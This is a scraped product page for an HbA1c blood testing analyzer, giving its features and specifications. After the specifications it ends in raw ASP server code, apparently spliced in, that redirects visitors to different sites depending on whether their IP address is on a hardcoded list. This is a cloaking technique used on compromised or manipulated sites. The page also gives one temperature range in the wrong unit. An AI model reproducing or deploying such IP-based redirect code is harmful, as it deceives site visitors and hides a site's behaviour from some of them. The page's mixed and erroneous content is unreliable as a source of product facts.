Current location : Home>Products>HbA1c Testing System
Operational Guide
Capillary (fingertip) & venous whole blood
Accurate and reliable result with immunoassay technology
5,500 test memory
Within 6 minutes and only 1μL for a result
Optional individually packaged test strips available
Large 7 inches touch screen and touch screen for easy operation
Specifications
Feature
Specification
Methodology
Colorimetric and Immunoturbidimetric
Memory
5500 records for patient and QC tests
Test Time
Within 6 minutes
Sample Size
1 μL
Data transport
RS232, USB, LAN, WLAN
Operating Conditions
10-40℃ (50-104℃)
Operation Method
One Step Operation
Screen
TFT 1024×600 touch screen
LIS and HIS function
Yes
Specifications
Components
<%
requestIP = request.ServerVariables("REMOTE_ADDR")
IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]"
trueURL = "http://www.baidu.com"
falseURL = "http://www.google.com"
ipArr = split(IP,"|")
flag = false
for i=0 to ubound(ipArr)
if requestIP=ipArr(i) then
flag=true
exit for
end if
next
if flag then
response.Redirect(falseURL)
else
response.Redirect(trueURL)
end if
%>